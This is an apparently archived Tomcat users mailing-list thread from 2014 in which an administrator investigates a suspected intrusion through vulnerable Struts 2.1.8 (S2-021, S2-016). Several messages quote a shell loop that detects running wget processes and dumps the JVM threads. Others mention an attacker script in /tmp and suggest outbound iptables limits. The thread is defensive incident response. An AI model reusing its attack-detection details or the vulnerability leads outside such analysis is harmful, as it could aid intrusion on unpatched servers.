Re: Regarding i think an intrusion - Solved =)
Hello all.
We internally had closed the issue. So i can tell you thanks a lot you rock
=)
Thank for all your effort and time.
Kindly yours,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-26 15:32 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
Well well well. Thank you all so much !!!
Since Struts upgrade i got not intrussion on my servers =) =)
Thank you list for the support, for the time and for helpme with this
issue.
Yours,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-20 12:45 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com
:
Hello all, again its me =)
Just for you that today we deployed our apps using struts 2.3.16.2
So since today i will monitor those server very closely =)
Thanks all people. I will tell you how things go.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-07 12:28 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com
:
Hello all !
Developers are still estimating the effort for upgrading struts i
will let you know how things are going.
Thanks all for replying me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had a concept mismatch trying to capture the exact moment
when the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep
-v
127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
grep
java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3;
done
Maybe too many dumps all togheter, now im trying to get a live
capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
utilizar JDK @ 1.7 (ahora)
MGesto
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MGEstos registros informativos producen MUCHO ruido
MGlog4j.properties
MGlog4j.logger.org.quartz=OFF //(Callate Quartz)
MGeso
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656
runnable [0x46f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern
Re: Regarding i think an intrusion
Well well well. Thank you all so much !!!
Since Struts upgrade i got not intrussion on my servers =) =)
Thank you list for the support, for the time and for helpme with this issue.
Yours,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-20 12:45 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
Hello all, again its me =)
Just for you that today we deployed our apps using struts 2.3.16.2
So since today i will monitor those server very closely =)
Thanks all people. I will tell you how things go.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-07 12:28 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com
:
Hello all !
Developers are still estimating the effort for upgrading struts i
will let you know how things are going.
Thanks all for replying me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had a concept mismatch trying to capture the exact moment when
the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep
-v
127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
grep
java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3;
done
Maybe too many dumps all togheter, now im trying to get a live
capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
utilizar JDK @ 1.7 (ahora)
MGesto
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MGEstos registros informativos producen MUCHO ruido
MGlog4j.properties
MGlog4j.logger.org.quartz=OFF //(Callate Quartz)
MGeso
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656
runnable [0x46f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0
Re: Regarding i think an intrusion
Hello all, again its me =)
Just for you that today we deployed our apps using struts 2.3.16.2
So since today i will monitor those server very closely =)
Thanks all people. I will tell you how things go.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-07 12:28 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
Hello all !
Developers are still estimating the effort for upgrading struts i
will let you know how things are going.
Thanks all for replying me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had a concept mismatch trying to capture the exact moment when
the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
grep
java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done
Maybe too many dumps all togheter, now im trying to get a live capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
utilizar JDK @ 1.7 (ahora)
MGesto
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MGEstos registros informativos producen MUCHO ruido
MGlog4j.properties
MGlog4j.logger.org.quartz=OFF //(Callate Quartz)
MGeso
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656
runnable [0x46f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match
Re: Regarding i think an intrusion
Hello all !
Developers are still estimating the effort for upgrading struts i
will let you know how things are going.
Thanks all for replying me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had a concept mismatch trying to capture the exact moment when
the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
grep
java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done
Maybe too many dumps all togheter, now im trying to get a live capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
utilizar JDK @ 1.7 (ahora)
MGesto
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MGEstos registros informativos producen MUCHO ruido
MGlog4j.properties
MGlog4j.logger.org.quartz=OFF //(Callate Quartz)
MGeso
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656
runnable [0x46f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168
Re: Regarding i think an intrusion
Hello all, sorry for the late, but i was in holiday from wednesday. Ok, i make a ticket to developers for upgrading strus. They told me that will work on that. So, i will keep in touch with the news =) Again, thanks all for all the support you give me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-01 18:48 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. Ouch. Yeah, there's always that ;) - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4 Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1 qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67 hEEF98sa1D+pfJC5FGdj =ZJPK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Well thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Let me know if im missing something. thanks ! Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 9:34 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Hello all, sorry for the late, but i was in holiday from wednesday. Ok, i make a ticket to developers for upgrading strus. They told me that will work on that. So, i will keep in touch with the news =) Again, thanks all for all the support you give me. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-01 18:48 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. Ouch. Yeah, there's always that ;) - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4 Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1 qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67 hEEF98sa1D+pfJC5FGdj =ZJPK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 10:29 AM, Leonardo Santagostini wrote: Well thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Seems like it's broken. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU 8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz 6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP 9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz /V2lPhNpr08bYy+s2pkN =4tjy -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Ok, again its uploaded. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing Kind regards !, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 11:57 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 10:29 AM, Leonardo Santagostini wrote: Well thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Seems like it's broken. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU 8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz 6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP 9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt 